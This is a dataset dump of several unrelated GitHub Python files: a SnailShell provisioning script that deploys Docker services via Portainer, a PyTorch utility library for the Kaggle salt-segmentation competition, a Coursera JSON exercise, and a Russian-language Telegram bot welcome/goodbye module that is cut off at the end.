_setup_control_panel(portainer_client):\n logger.info('Setting up Control Panel...')\n from snailshell_cp.models import Service, DeployJob\n from snailshell_cp.tasks import deploy_container\n\n container_sshdir = f'/home/{settings.ENV.CONTROL_PANEL_LINUX_USER}/.ssh'\n\n service_cp = Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.CONTROL_PANEL_IMAGE_NAME,\n default_image_tag=settings.ENV.CONTROL_PANEL_IMAGE_TAG,\n container_name=settings.ENV.CONTROL_PANEL_CONTAINER_NAME,\n is_system_service=True,\n host_config=jdump({\n 'Binds': [\n f'{HOST_SSH_DIR}:{container_sshdir}',\n ],\n 'PortBindings': {\n f'8000/tcp': [\n {'HostPort': str(settings.ENV.CONTROL_PANEL_PORT)},\n ],\n },\n }),\n volumes=jdump({container_sshdir: {}}),\n user_name=settings.ENV.CONTROL_PANEL_LINUX_USER,\n )\n deploy_job_cp = DeployJob.objects.create(\n service=service_cp,\n )\n deploy_container(\n deploy_job_id=deploy_job_cp.id,\n portainer_client=portainer_client,\n is_provisioning=True,\n )\n\n # Celery Main\n service_celery = Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.CONTROL_PANEL_IMAGE_NAME,\n default_image_tag=settings.ENV.CONTROL_PANEL_IMAGE_TAG,\n container_name=settings.ENV.CONTROL_PANEL_CELERY_MAIN_CONTAINER_NAME,\n is_system_service=True,\n command=jdump(['./run_celery_main.sh']),\n user_name=settings.ENV.CONTROL_PANEL_LINUX_USER,\n )\n deploy_job_celery = DeployJob.objects.create(\n service=service_celery,\n )\n deploy_container(\n deploy_job_id=deploy_job_celery.id,\n portainer_client=portainer_client,\n is_provisioning=True,\n )\n\n # Celery Service\n service_celery = Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.CONTROL_PANEL_IMAGE_NAME,\n default_image_tag=settings.ENV.CONTROL_PANEL_IMAGE_TAG,\n container_name=settings.ENV.CONTROL_PANEL_CELERY_SERVICE_CONTAINER_NAME,\n is_system_service=True,\n command=jdump(['./run_celery_service.sh']),\n user_name=settings.ENV.CONTROL_PANEL_LINUX_USER,\n )\n deploy_job_celery = DeployJob.objects.create(\n service=service_celery,\n )\n deploy_container(\n deploy_job_id=deploy_job_celery.id,\n portainer_client=portainer_client,\n is_provisioning=True,\n )\n\n\n@cp_task\ndef provision_master_node(reinstall_docker=True):\n \"\"\"\n Run on a main node once to set up all the services needed.\n WARNING: it wipes out everything, all unsaved data will be lost.\n \"\"\"\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'snailshell_cp.settings')\n\n reinstall_docker = (reinstall_docker not in (False, '0', 'false', 'False'))\n\n reset_docker(reinstall_docker=reinstall_docker, local_mode=True)\n local('rm -rf /opt/portainer/')\n local(f'rm -rf {HOST_PG_DIR}/*')\n\n _setup_portainer()\n portainer_client = _get_portainer_client()\n\n _setup_postgres(portainer_client)\n _setup_rabbitmq(portainer_client)\n _setup_control_panel(portainer_client)\n\n generate_local_ssh_key()\n","repo_name":"Flid/SnailShell-master","sub_path":"snailshell_cp/management/cluster_control/provision_master.py","file_name":"provision_master.py","file_ext":"py","file_size_in_byte":9234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40178376066","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 17 20:19:23 2018\n\n@author: Allen\n\"\"\"\n\nimport zipfile\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom 
torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nfrom skimage import io, transform\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as ply\nimport os\nimport sys\nimport imageio\nfrom PIL import Image\nimport glob\nimport matplotlib.pyplot as plt\nimport time\nimport math\nimport datetime as dt\nimport pytz\nimport pickle\nimport logging\nfrom io import BytesIO\n\n\nif torch.cuda.is_available():\n dtype = torch.cuda.FloatTensor ## UNCOMMENT THIS LINE IF YOU'RE ON A GPU!\nelse: \n dtype = torch.FloatTensor\n \n \nclass IOU_Loss(nn.Module):\n def __init__(self):\n super().__init__()\n \n def forward(self, y_pred, y):\n #print(y_pred.requires_grad)\n #y_pred = torch.where(y_pred.ge(0.5), torch.tensor(1.0), torch.tensor(0.0))\n i = y_pred.mul(y)\n u = (y_pred + y) - i\n mean_iou = torch.mean(i.view(i.shape[0],-1).sum(1) / u.view(i.shape[0],-1).sum(1))\n iou_loss = 1 - mean_iou\n #from boxx import g\n #g()\n \n return iou_loss\n \n\n \nclass Rescale(object):\n \"\"\"Rescale the image in a sample to a given size.\n\n Args:\n output_size (int): Desired output size. \n \"\"\"\n\n def __init__(self, scale='random', min_scale=1, max_scale=3):\n self.scale = scale \n self.min_scale = min_scale \n self.max_scale = max_scale \n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n \n if self.scale == 'random':\n current_scale = np.clip((np.random.rand() * self.max_scale), self.min_scale, self.max_scale)\n else:\n current_scale = self.scale\n \n output_size = round(np.max(image.shape) * current_scale) \n \n if mask is not None:\n image = np.concatenate([image,mask],2)\n resized_img = transform.resize(image, (output_size, output_size), mode='constant', preserve_range=True)\n #print(resized_img.shape)\n img_final = resized_img[:,:,0:1]\n if mask is not None:\n mask_final = resized_img[:,:,1:]\n\n return {'image':img_final, 'mask':mask_final}\n\nclass RandomCrop(object):\n \"\"\"Crop randomly the image in a sample.\n\n Args:\n output_size (int): Desired output size. \n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, int)\n self.output_size = output_size\n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n if mask is not None:\n image = np.concatenate([image,mask],2)\n\n h, w = image.shape[:2]\n\n new_h = new_w = self.output_size\n top = 0 if h == new_h else np.random.randint(0, h - new_h)\n left = 0 if w == new_w else np.random.randint(0, w - new_w)\n\n\n cropped_image = image[top: top + new_h,\n left: left + new_w]\n \n img_final = cropped_image[:,:,0:1]\n if mask is not None:\n mask_final = cropped_image[:,:,1:]\n\n return {'image':img_final, 'mask':mask_final}\n\nclass Flip(object):\n \"\"\"Crop randomly the image in a sample.\n\n Args:\n output_size (int): Desired output size. 
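(Note: this docstring was copied from RandomCrop; Flip takes an orient argument, 'H', 'V', 'NA' or 'random' per the assert, while the flip logic below checks 'H'/'W'.)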
\n \"\"\"\n\n def __init__(self, orient='random'):\n assert orient in ['H', 'V', 'NA', 'random']\n self.orient = orient\n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n if self.orient=='random':\n current_orient = np.random.choice(['H', 'W', 'NA', 'NA']) \n else:\n current_orient = self.orient\n \n if mask is not None:\n image = np.concatenate([image,mask],2)\n\n if current_orient == 'H':\n flipped_image = image[:,::-1,:] - np.zeros_like(image)\n elif current_orient == 'W':\n flipped_image = image[::-1,:,:] - np.zeros_like(image)\n else:\n # do not flip if orient is NA\n flipped_image = image\n img_final = flipped_image[:,:,0:1]\n if mask is not None:\n mask_final = flipped_image[:,:,1:]\n\n return {'image':img_final, 'mask':mask_final}\n\n'''composed = transforms.Compose([Rescale(scale='random', max_scale=5),\n RandomCrop(101),\n Flip(orient='random')])\n\n\ntransformed = composed({'image':image, 'mask':mask})\nx_final, m_final = transformed['image'], transformed['mask']'''\n\nclass SaltDataset(Dataset):\n \"\"\"Face Landmarks dataset.\"\"\"\n\n def __init__(self, np_img, np_mask, df_depth, mean_img, img_out_size=101, transform=None):\n \"\"\"\n Args:\n data_dir (string): Path to the image files.\n train (bool): Load train or test data\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.np_img = np_img\n self.np_mask = np_mask.clip(0,1)\n self.df_depth = df_depth\n self.mean_img = mean_img\n self.img_out_size = img_out_size\n self.transform = transform\n\n def __len__(self):\n return len(self.np_img)\n\n def __getitem__(self, idx):\n\n X_orig = self.np_img[idx]\n X = X_orig - self.mean_img\n \n if self.np_mask is None:\n y = np.zeros((101,101,1))\n else:\n y = self.np_mask[idx]\n \n if self.transform:\n transformed = self.transform({'image':X, 'mask': y})\n X = transformed['image']\n y = transformed['mask']\n \n #print(X.dtype)\n X = np.moveaxis(X, -1,0)\n \n pad_size = self.img_out_size - self.np_img.shape[2]\n X = np.pad(X, [(0, 0),(0, pad_size), (0, pad_size)], mode='constant')\n #print(X.dtype)\n\n d = self.df_depth.iloc[idx,0]\n #id = self.df_depth.index[idx]\n #from boxx import g\n #g()\n X = torch.from_numpy(X).float().type(dtype)\n y = torch.from_numpy(y).float().squeeze().type(dtype)\n\n return (X,y,d,idx)\n \n\nclass SaltNet(nn.Module):\n def __init__(self):\n super().__init__()\n self.seq = nn.Sequential(\n nn.Conv2d(1,64,3, padding=10),\n nn.MaxPool2d(2, 2),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.Conv2d(64,128,3),\n nn.MaxPool2d(2, 2),\n nn.ReLU(),\n nn.BatchNorm2d(128),\n nn.Conv2d(128,256,3),\n nn.MaxPool2d(2, 2),\n nn.ReLU(),\n nn.BatchNorm2d(256),\n nn.ConvTranspose2d(256, 128, 2, stride=2),\n nn.ReLU(),\n nn.BatchNorm2d(128),\n nn.ConvTranspose2d(128, 64, 2, stride=2),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.ConvTranspose2d(64, 1, 2, stride=2, padding=1),\n nn.Sigmoid()\n )\n \n def forward(self, X):\n out = self.seq(X)\n return torch.clamp(out[:,:,:-1,:-1].squeeze(), 0.0, 1.0)\n \n \ndef load_all_data():\n try:\n print('Try loading data from npy and pickle files...')\n np_train_all = np.load('./data/np_train_all.npy')\n np_train_all_mask = np.load('./data/np_train_all_mask.npy')\n np_test = np.concatenate([np.load('./data/np_test_0.npy'), np.load('./data/np_test_1.npy')])\n with open('./data/misc_data.pickle', 'rb') as f:\n misc_data = pickle.load(f)\n print('Data loaded.')\n return (np_train_all, np_train_all_mask, np_test, misc_data)\n \n except:\n print('npy files not found. 
Reload data from raw images...')\n np_train_all, np_train_all_ids = load_img_to_np('./data/train/images')\n np_train_all_mask, np_train_all_mask_ids = load_img_to_np('./data/train/masks')\n df_train_all_depth = pd.read_csv('./data/depths.csv').set_index('id')\n np_test, np_test_ids = load_img_to_np('./data/test/images')\n np.save('./data/np_train_all.npy', np_train_all)\n np.save('./data/np_train_all_mask.npy', np_train_all_mask)\n for k, v in enumerate(np.split(np_test,2)):\n np.save(f'./data/np_test_{k}.npy', v)\n misc_data = {'df_train_all_depth': df_train_all_depth,\n 'np_train_all_ids': np_train_all_ids,\n 'np_train_all_mask_ids': np_train_all_mask_ids,\n 'np_test_ids': np_test_ids}\n with open('./data/misc_data.pickle', 'wb') as f:\n pickle.dump(misc_data, f, protocol=pickle.HIGHEST_PROTOCOL)\n print('Data loaded.')\n return (np_train_all, np_train_all_mask, np_test, misc_data)\n \n \ndef rle_encoder2d(x):\n if isinstance(x, torch.Tensor):\n x = x.detach().numpy()\n s = pd.Series(x.clip(0,1).flatten('F'))\n s.index = s.index+1\n df = s.to_frame('pred').assign(zero_cumcnt=s.eq(0).cumsum())\n df = df.loc[df.pred.gt(0)]\n df_rle = df.reset_index().groupby('zero_cumcnt').agg({'index': min, 'pred': sum}).astype(int).astype(str)\n rle = ' '.join((df_rle['index'] + ' '+df_rle['pred']).tolist())\n \n return rle\n \n \ndef rle_encoder3d(x): \n return np.r_[[rle_encoder2d(e) for e in x]]\n \n \ndef load_img_to_np(img_path, num_channel=1):\n images = []\n img_ids = []\n for filename in sorted(glob.glob(f'{img_path}/*.png')): #assuming png\n img_id = filename.split('\\\\')[-1].split('.')[0]\n img_ids.append(img_id)\n images.append(np.array(imageio.imread(filename), dtype=np.uint8).reshape(101,101,-1)[:,:,0:num_channel])\n return (np.r_[images], img_ids)\n \n \ndef load_single_img(path, show=False):\n img = np.array(imageio.imread(path), dtype=np.uint8)\n if show:\n plt.imshow(img, cmap='gray')\n return img\n \n \ndef calc_raw_iou(a, b):\n if isinstance(a, torch.Tensor):\n a = a.cpu().detach().numpy()\n if isinstance(b, torch.Tensor):\n b = b.cpu().detach().numpy()\n a = np.clip(a, 0, 1)\n b = np.clip(b, 0, 1)\n u = np.sum(np.clip(a+b, 0, 1), (1,2)).astype(np.float)\n i = np.sum(np.where((a+b)==2, 1, 0), (1,2)).astype(np.float)\n with np.errstate(divide='ignore',invalid='ignore'):\n iou = np.where(i==u, 1, np.where(u==0, 0, i/u))\n \n return iou\n \n \ndef calc_mean_iou(a, b):\n thresholds = np.array([0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95])\n iou = calc_raw_iou(a, b)\n iou_mean = (iou[:,None]>thresholds).mean(1).mean()\n\n return iou_mean\n \n \ndef timeSince(since):\n now = time.time()\n s = now - since\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n \n \ndef get_current_time_as_fname():\n timestamp = (\n dt.datetime.now(pytz.timezone('Australia/Melbourne'))\n .strftime('%Y_%m_%d_%H_%M_%S')\n )\n \n return timestamp\n \n \ndef plot_img_mask_pred(images, labels=None, img_per_line=8):\n images = [i.cpu().detach().numpy().squeeze() if isinstance(i, torch.Tensor) else i.squeeze() for i in images]\n num_img = len(images)\n if labels is None:\n labels = range(num_img)\n\n rows = np.ceil(num_img/img_per_line).astype(int)\n cols = min(img_per_line, num_img)\n f, axarr = plt.subplots(rows,cols)\n if rows==1:\n axarr = axarr.reshape(1,-1)\n f.set_figheight(3*min(img_per_line, num_img)//cols*rows)\n f.set_figwidth(3*min(img_per_line, num_img))\n for i in range(num_img):\n r = i//img_per_line\n c = np.mod(i,img_per_line)\n axarr[r,c].imshow(images[i], cmap='gray')\n 
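# overlay grid lines on each panel for easier visual comparison\n        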
axarr[r,c].grid()\n axarr[r,c].set_title(labels[i])\n\n plt.show()\n \n \ndef adjust_predictions(zero_mask_cut_off, X, y_pred, y=None):\n if isinstance(X, torch.Tensor):\n X = X.cpu().detach().numpy()\n if isinstance(y_pred, torch.Tensor):\n y_pred = y_pred.cpu().detach().numpy()\n if isinstance(y, torch.Tensor):\n y = y.cpu().detach().numpy()\n y_pred_adj = y_pred.clip(0,1)\n\n # Set predictions to all 0 for black images\n black_img_mask = (X.mean((1,2,3)) == 0)\n y_pred_adj[black_img_mask]=0\n\n # set all predictions to 0 if the number of positive predictions is less than ZERO_MASK_CUTOFF\n y_pred_adj = np.r_[[e if e.sum()>zero_mask_cut_off else np.zeros_like(e) for e in y_pred_adj]]\n \n if y is not None:\n print(f'IOU score before: {calc_mean_iou(y_pred, y)}, IOU Score after:{calc_mean_iou(y_pred_adj, y)}')\n \n return y_pred_adj\n \ndef show_img_grid():\n pass\n #plt.imshow(torchvision.utils.make_grid(torch.from_numpy(y_train_black).unsqueeze(1)).permute(1, 2, 0))\n \n \ndef join_files(filePrefix, filePath, newFileName=None, returnFileObject=False, removeChunks=False): \n noOfChunks = int(glob.glob(f'{filePath}/{filePrefix}*')[0].split('-')[-1])\n dataList = []\n j = 0\n for i in range(0, noOfChunks, 1):\n j += 1\n chunkName = f\"{filePrefix}-chunk-{j}-Of-{noOfChunks}\"\n f = open(chunkName, 'rb')\n dataList.append(f.read())\n f.close()\n if removeChunks:\n os.remove(chunkName)\n\n if returnFileObject:\n fileOut = BytesIO()\n for data in dataList:\n fileOut.write(data)\n fileOut.seek(0)\n return fileOut \n else:\n fileOut = open(newFileName, 'wb')\n for data in dataList:\n fileOut.write(data)\n f2.close()\n print(f'File parts merged to {newFileName} successfully.')\n \n# define the function to split the file into smaller chunks\ndef split_file_save(inputFile, outputFilePrefix, outputFolder, chunkSize=10000000):\n # read the contents of the file\n if isinstance(inputFile, BytesIO):\n data = inputFile.read()\n inputFile.close()\n else:\n f = open(inputFile, 'rb')\n data = f.read()\n f.close()\n\n# get the length of data, ie size of the input file in bytes\n bytes = len(data)\n\n# calculate the number of chunks to be created\n if sys.version_info.major == 3:\n noOfChunks = int(bytes / chunkSize)\n elif sys.version_info.major == 2:\n noOfChunks = bytes / chunkSize\n if(bytes % chunkSize):\n noOfChunks += 1\n\n chunkNames = []\n j = 0\n for i in range(0, bytes + 1, chunkSize):\n j += 1\n fn1 = f\"{outputFilePrefix}-chunk-{j}-Of-{noOfChunks}\"\n chunkNames.append(fn1)\n f = open(f'{outputFolder}/{fn1}', 'wb')\n f.write(data[i:i + chunkSize])\n f.close()\n \n return chunkNames\n \ndef get_logger(logger_name, level=logging.DEBUG):\n # logger\n file_name = '{}{}'.format('logs/',\n logger_name)\n timestamp = dt.datetime.now(pytz.timezone('Australia/Melbourne'))\\\n .strftime('%Y_%m_%d_%Hh')\n log_file = '{}_{}.log'.format(file_name, timestamp)\n logger = logging.getLogger(logger_name)\n\n formatter = (\n logging\n .Formatter(fmt='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n datefmt='%d/%m/%Y %H:%M:%S')\n )\n\n # for printing debug details\n fileHandler = logging.FileHandler(log_file, mode='a')\n fileHandler.setFormatter(formatter)\n fileHandler.setLevel(level)\n\n # for printing error messages\n streamHandler = logging.StreamHandler()\n streamHandler.setFormatter(formatter)\n streamHandler.setLevel(logging.DEBUG)\n\n logger.setLevel(level)\n logger.handlers = []\n logger.addHandler(fileHandler)\n logger.addHandler(streamHandler)\n\n return logging.getLogger(logger_name)\n 
","repo_name":"allen-q/pytorch-learning","sub_path":"kaggle/salt/salt_func_lib.py","file_name":"salt_func_lib.py","file_ext":"py","file_size_in_byte":15708,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"26636477596","text":"import urllib.request, urllib.parse, urllib.error\r\nimport json\r\nurl ='http://py4e-data.dr-chuck.net/comments_438567.json'\r\nhtml = urllib.request.urlopen(url).read()\r\ninfo = json.loads(html)\r\n#print(info['comments'][0]['count'])\r\n#print(json.dumps(info, indent=4))\r\ni=0\r\nsum=0\r\nwhile True:\r\n try:\r\n p = info['comments'][i]['count']\r\n n = info['comments'][i]['name']\r\n i=i+1\r\n sum=sum+p\r\n except:\r\n break\r\nprint(sum)","repo_name":"tasnia18/Python-assignment-certified-course-in-Coursera-","sub_path":"Using Python to access web data/jsondata.py","file_name":"jsondata.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16886513328","text":"import html\nfrom typing import Optional, List\n\n\nfrom telegram import Message, Chat, Update, Bot, User\nfrom telegram import ParseMode, InlineKeyboardMarkup\nfrom telegram.error import BadRequest\nfrom telegram.ext import MessageHandler, Filters, CommandHandler, run_async\nfrom telegram.utils.helpers import mention_markdown, mention_html, escape_markdown\n\nimport tg_bot.modules.sql.welcome_sql as sql\nimport tg_bot.modules.sql.top_users_sql as sql_top\nimport tg_bot.modules.sql.global_bans_sql as sql_ban\nfrom tg_bot import dispatcher, OWNER_ID, LOGGER, CHAT_ID\nfrom tg_bot.modules.helper_funcs.chat_status import user_admin, bot_can_delete\nfrom tg_bot.modules.helper_funcs.misc import build_keyboard, revert_buttons\nfrom tg_bot.modules.helper_funcs.msg_types import get_welcome_type\nfrom tg_bot.modules.helper_funcs.string_handling import markdown_parser, \\\n escape_invalid_curly_brackets\nfrom tg_bot.modules.log_channel import loggable\n\nVALID_WELCOME_FORMATTERS = ['first', 'last', 'fullname', 'username', 'id', 'count', 'chatname', 'mention']\n\nENUM_FUNC_MAP = {\n sql.Types.TEXT.value: dispatcher.bot.send_message,\n sql.Types.BUTTON_TEXT.value: dispatcher.bot.send_message,\n sql.Types.STICKER.value: dispatcher.bot.send_sticker,\n sql.Types.DOCUMENT.value: dispatcher.bot.send_document,\n sql.Types.PHOTO.value: dispatcher.bot.send_photo,\n sql.Types.AUDIO.value: dispatcher.bot.send_audio,\n sql.Types.VOICE.value: dispatcher.bot.send_voice,\n sql.Types.VIDEO.value: dispatcher.bot.send_video\n}\n\n# do not async\ndef send(update, message, keyboard, backup_message):\n try:\n msg = update.effective_message.reply_text(message, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard)\n except IndexError:\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: текущее сообщение было \"\n \"недействительно из-за проблем. Может быть\"\n \"из-за имени пользователя.\"),\n parse_mode=ParseMode.MARKDOWN)\n except KeyError:\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: текущее сообщение: \"\n \"недействительно из-за проблемы с некоторыми неуместными\"\n \"фигурными скобками. Обновите\"),\n parse_mode=ParseMode.MARKDOWN)\n except BadRequest as excp:\n if excp.message == \"Button_url_invalid\":\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: у текущего сообщения недействительный URL \"\n \"на одной из кнопок. 
Обновите.\"),\n parse_mode=ParseMode.MARKDOWN)\n elif excp.message == \"Unsupported url protocol\":\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: в текущем сообщении есть кнопки, которые \"\n \"используют протоколы URL, которые не поддерживаются\"\n \"Телеграммом. Пожалуйста, обновите.\"),\n parse_mode=ParseMode.MARKDOWN)\n elif excp.message == \"Wrong url host\":\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: в текущем сообщении есть неправильные URL-адреса. \"\n \"Пожалуйста обновите.\"),\n parse_mode=ParseMode.MARKDOWN)\n LOGGER.warning(message)\n LOGGER.warning(keyboard)\n LOGGER.exception(\"Не удалось разобрать! получил неверный URL-адрес хоста\")\n else:\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание. Произошла ошибка при отправке \"\n \"персонализированного сообщения. Пожалуйста, обновите.\"),\n parse_mode=ParseMode.MARKDOWN)\n LOGGER.exception()\n\n return msg\n\n\n@run_async\n@bot_can_delete\ndef new_member(bot: Bot, update: Update):\n chat = update.effective_chat # type: Optional[Chat]\n should_welc, cust_welcome, welc_type = sql.get_welc_pref(chat.id)\n if should_welc:\n sent = None\n new_members = update.effective_message.new_chat_members\n for new_mem in new_members:\n # Give the owner a special welcome\n user_id = new_mem.id\n name = new_mem.first_name\n if sql_ban.is_user_gbanned(user_id):\n update.effective_chat.kick_member(user_id)\n update.effective_message.reply_text(f\"@{new_mem.username} Это плохой человек, их здесь не должно быть!\")\n else:\n if name == None:\n name = new_mem.last_name\n try:\n if chat.id == CHAT_ID:\n sql_top.get_user_top(user_id, name)\n except:\n pass\n if new_mem.id == OWNER_ID:\n update.effective_message.reply_text(\"Создатель в доме, давай начнем эту вечеринку!\")\n continue\n\n # Don't welcome yourself\n elif new_mem.id == bot.id:\n continue\n\n else:\n # If welcome message is media, send with appropriate function\n if welc_type != sql.Types.TEXT and welc_type != sql.Types.BUTTON_TEXT:\n ENUM_FUNC_MAP[welc_type](chat.id, cust_welcome)\n return\n # else, move on\n first_name = new_mem.first_name or \"PersonWithNoName\" # edge case of empty name - occurs for some bugs.\n\n if cust_welcome:\n if new_mem.last_name:\n fullname = \"{} {}\".format(first_name, new_mem.last_name)\n else:\n fullname = first_name\n count = chat.get_members_count()\n mention = mention_markdown(new_mem.id, first_name)\n if new_mem.username:\n username = \"@\" + escape_markdown(new_mem.username)\n else:\n username = mention\n\n valid_format = escape_invalid_curly_brackets(cust_welcome, VALID_WELCOME_FORMATTERS)\n res = valid_format.format(first=escape_markdown(first_name),\n last=escape_markdown(new_mem.last_name or first_name),\n fullname=escape_markdown(fullname), username=username, mention=mention,\n count=count, chatname=escape_markdown(chat.title), id=new_mem.id)\n buttons = sql.get_welc_buttons(chat.id)\n keyb = build_keyboard(buttons)\n else:\n res = sql.DEFAULT_WELCOME.format(first=first_name)\n keyb = []\n\n keyboard = InlineKeyboardMarkup(keyb)\n sent = send(update, res, keyboard,\n sql.DEFAULT_WELCOME.format(fullname=fullname, chatname=chat.title)) # type: Optional[Message]\n\n prev_welc = sql.get_clean_pref(chat.id)\n if prev_welc:\n try:\n bot.delete_message(chat.id, prev_welc)\n except BadRequest as excp:\n pass\n\n if sent:\n sql.set_clean_welcome(chat.id, sent.message_id)\n\n\n@run_async\ndef left_member(bot: Bot, 
update: Update):\n chat = update.effective_chat # type: Optional[Chat]\n \n should_goodbye, cust_goodbye, goodbye_type = sql.get_gdbye_pref(chat.id)\n if should_goodbye:\n left_mem = update.effective_message.left_chat_member\n user_id = left_mem.id\n try:\n sql_top.delete_user_top(user_id)\n except:\n pass\n if left_mem:\n # Ignore bot being kicked\n if left_mem.id == bot.id:\n return\n\n # Give the owner a special goodbye\n if left_mem.id == OWNER_ID:\n update.effective_message.reply_text(\"RIP юзер\")\n return\n\n # if media goodbye, use appropriate function for it\n if goodbye_type != sql.Types.TEXT and goodbye_type != sql.Types.BUTTON_TEXT:\n ENUM_FUNC_MAP[goodbye_type](chat.id, cust_goodbye)\n return\n\n first_name = left_mem.first_name or \"PersonWithNoName\" # edge case of empty name - occurs for some bugs.\n if cust_goodbye:\n if left_mem.last_name:\n fullname = \"{} {}\".format(first_name, left_mem.last_name)\n else:\n fullname = first_name\n count = chat.get_members_count()\n mention = mention_markdown(left_mem.id, first_name)\n if left_mem.username:\n username = \"@\" + escape_markdown(left_mem.username)\n else:\n username = mention\n\n valid_format = escape_invalid_curly_brackets(cust_goodbye, VALID_WELCOME_FORMATTERS)\n res = valid_format.format(first=escape_markdown(first_name),\n last=escape_markdown(left_mem.last_name or first_name),\n fullname=escape_markdown(fullname), username=username, mention=mention,\n count=count, chatname=escape_markdown(chat.title), id=left_mem.id)\n buttons = sql.get_gdbye_buttons(chat.id)\n keyb = build_keyboard(buttons)\n\n else:\n res = sql.DEFAULT_GOODBYE\n keyb = []\n keyboard = InlineKeyboardMarkup(keyb)\n send(update, res, keyboard, sql.DEFAULT_GOODBYE)\n\n\n@run_async\n@user_admin\ndef welcome(bot: Bot, update: Update, args: List[str]):\n chat = update.effective_chat # type: Optional[Chat]\n # if no args, show current replies.\n if len(args) == 0 or args[0].lower() == \"noformat\":\n noformat = args and args[0].lower() == \"noformat\"\n pref, welcome_m, welcome_type = sql.get_welc_pref(chat.id)\n update.effective_message.reply_text(\n \"В этом чате параметр приветствия установлен на: `{}`. 
\\n*Приветственное сообщение \"\n \"(не заполняя {{}}):*\".format(pref),\n parse_mode=ParseMode.MARKDOWN)\n\n if welcome_type == sql.Types.BUTTON_TEXT:\n buttons = sql.get_welc_buttons(chat.id)\n if noformat:\n welcome_m += revert_buttons(buttons)\n update.effective_message.reply_text(welcome_m)\n\n else:\n keyb = build_keyboard(buttons)\n keyboard = InlineKeyboardMarkup(keyb)\n\n send(update, welcome_m, keyboard, sql.DEFAULT_WELCOME)\n\n else:\n if noformat:\n ENUM_FUNC_MAP[welcome_type](chat.id, welcome_m)\n\n else:\n ENUM_FUNC_MAP[welcome_type](chat.id, welcome_m, parse_mode=ParseMode.MARKDOWN)\n\n elif len(args) >= 1:\n if args[0].lower() in (\"on\", \"yes\"):\n sql.set_welc_preference(str(chat.id), True)\n update.effective_message.reply_text(\"Буду вежливым!\")\n\n elif args[0].lower() in (\"off\", \"no\"):\n sql.set_welc_preference(str(chat.id), False)\n update.effective_message.reply_text(\"Я дуюсь, больше не здороваюсь.\")\n\n else:\n # idek what you're writing, say yes or no\n update.effective_message.reply_text(\"Я понимаю только 'on/yes' или 'off/no'!\")\n\n\n@run_async\n@user_admin\ndef goodbye(bot: Bot, update: Update, args: List[str]):\n chat = update.effective_chat # type: Optional[Chat]\n\n if len(args) == 0 or args[0] == \"noformat\":\n noformat = args and args[0] == \"noformat\"\n pref, goodbye_m, goodbye_type = sql.get_gdbye_pref(chat.id)\n update.effective_message.reply_text(\n \"В этом чате параметр прощания установлен на: `{}`. \\n*Прощальное сообщение \"\n \"(не заполняя {{}}):*\".format(pref),\n parse_mode=ParseMode.MARKDOWN)\n\n if goodbye_type == sql.Types.BUTTON_TEXT:\n buttons = sql.get_gdbye_buttons(chat.id)\n if noformat:\n goodbye_m += revert_buttons(buttons)\n update.effective_message.reply_text(goodbye_m)\n\n else:\n keyb = build_keyboard(buttons)\n keyboard = InlineKeyboardMarkup(keyb)\n\n send(update, goodbye_m, keyboard, sql.DEFAULT_GOODBYE)\n\n else:\n if noformat:\n ENUM_FUNC_MAP[goodbye_type](chat.id, goodbye_m)\n\n else:\n ENUM_FUNC_MAP[goodbye_type](chat.id, goodbye_m, parse_mode=ParseMode.MARKDOWN)\n\n elif len(args) >= 1:\n if args[0].lower() in (\"on\", \"yes\"):\n sql.set_gdbye_preference(str(chat.id), True)\n update.effective_message.reply_text(\"Мне будет жаль, когда люди уйдут!\")\n\n elif args[0].lower() in (\"off\", \"no\"):\n sql.set_gdbye_preference(str(chat.id), False)\n update.effective_message.reply_text(\"Они уходят, они мертвы для меня.\")\n\n else:\n # idek what you're writing, say yes or no\n update.effective_message.reply_text(\"Я понимаю только 'on/yes' или 'off/no'!\")\n\n\n@run_async\n@user_admin\n@loggable\ndef set_welcome(bot: Bot, update: Update) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n\n text, data_type, content, buttons = get_welcome_type(msg)\n\n if data_type is None:\n msg.reply_text(\"Вы не указали, чем отвечать!\")\n return \"\"\n\n sql.set_custom_welcome(chat.id, content or text, data_type, buttons)\n msg.reply_text(\"Пользовательское приветственное сообщение успешно настроено!\")\n\n return \"{}:\" \\\n \"\\n#SET_WELCOME\" \\\n \"\\nAdmin: {}\" \\\n \"\\nУстановите приветственное сообщение.\".format(html.escape(chat.title),\n mention_html(user.id, 